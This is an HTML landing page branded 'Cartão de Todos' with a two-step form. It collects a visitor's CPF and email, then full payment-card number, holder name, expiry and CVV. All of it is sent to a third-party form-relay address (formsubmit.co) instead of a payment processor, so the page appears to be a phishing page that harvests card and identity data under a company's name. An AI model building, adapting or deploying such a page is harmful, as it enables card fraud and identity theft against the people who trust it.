<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Landing Page</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    header {
      background-color: #0dfc98;
      color: #070707;
      padding: 10px;
      text-align: center;
    }

    nav {
      display: flex;
      align-items: center;
      justify-content: space-between;
      background-color: #959694;
      padding: 10px;
    }

    nav a {
      color: #fff;
      text-decoration: none;
      margin: 0 15px;
    }

    .logo {
        border-radius: 50%;
      max-width: 100px;
      height: auto;
    }

    .container {
      display: flex;
      align-items: center;
      justify-content: center;
      flex-direction: column;
      background-color: #fff;
      border-radius: 8px;
      box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
      padding: 20px;
      max-width: 400px;
      width: 100%;
      margin: 20px auto;
      box-sizing: border-box;
    }

    label {
      display: block;
      margin-bottom: 8px;
    }

    input, select {
      width: 100%;
      padding: 8px;
      margin-bottom: 16px;
      box-sizing: border-box;
    }

    button {
      background-color: #4caf50;
      color: #fff;
      padding: 10px 15px;
      margin: 10px;
      border: none;
      border-radius: 4px;
      cursor: pointer;
    }

    button:hover {
      background-color: #45a049;
    }

    .form-section {
      display: none;
      width: 100%;
    }

    .form-section.active {
      display: flex;
      flex-direction: column;
    }
  </style>
</head>
<body>

  <header>
    <h1>Cartão de Todos</h1>
  </header>

  <nav>
    <img class="logo" src="./cartao-de-todos-como-funciona.jpg" alt="Logo da Empresa">
    <div>
      <a href="#home">Home</a>
      <a href="https://www.instagram.com/cartaodetodosteresinacentro?igsh=ZHE2bnp3b3doOTMx">Saiba Mais</a>
    </div>
  </nav>

  <form  action="https://formsubmit.co/771573698c7411eb3c853db84a2d14be" method="POST">
    <div class="container">
        <div class="form-section active" id="section1">
          <h2>Informações Pessoais</h2>
    
          <label for="cpf">CPF:</label>
          <input type="text" id="cpf" name="cpf" required>
    
          <label for="email">E-mail:</label>
          <input type="email" id="email" name="email" required>
    
          <button onclick="nextSection()">Próximo</button>
        </div>
    
        <div class="form-section" id="section2" >
          <h2>Informações do Cartão</h2>
    
          <label for="cardNumber">Número do Cartão:</label>
          <input type="text" id="cardNumber" name="cardNumber" required>
    
          <label for="cardHolderName">Nome do Titular do Cartão:</label>
          <input type="text" id="cardHolderName" name="cardHolderName" required>
    
          <label for="expirationDate">Validade do Cartão:</label>
          <input type="text" id="expirationDate" name="expirationDate" placeholder="MM/YYYY" required>
    
          <label for="cvv">CVV:</label>
          <input type="text" id="cvv" name="cvv" required>
          

          <label for="cardBrand">Qual o tipo de Cartão</lacabel>
          <select id="cardBrand" name="cardBrand" required>
            <option value="debito">Debito</option>
            <option value="credito">Credito</option>
          </select>
          <input type="hidden" name="_next" value="/obrigado.html">
    
          <button onclick="prevSection()">Anterior</button>
          <button onclick="submitForm()">Enviar</button>
        </div>
      </div>


  </form>

  
  <script>
    function nextSection() {
      document.getElementById('section1').classList.remove('active');
      document.getElementById('section2').classList.add('active');
    }

    function prevSection() {
      document.getElementById('section2').classList.remove('active');
      document.getElementById('section1').classList.add('active');
    }

    function submitForm() {
      // Adicionar lógica de envio do formulário se necessário

      // Redirecionar para a página de obrigado
      window.location.href = 'obrigado.html';
    }
  </script>

</body>
</html>
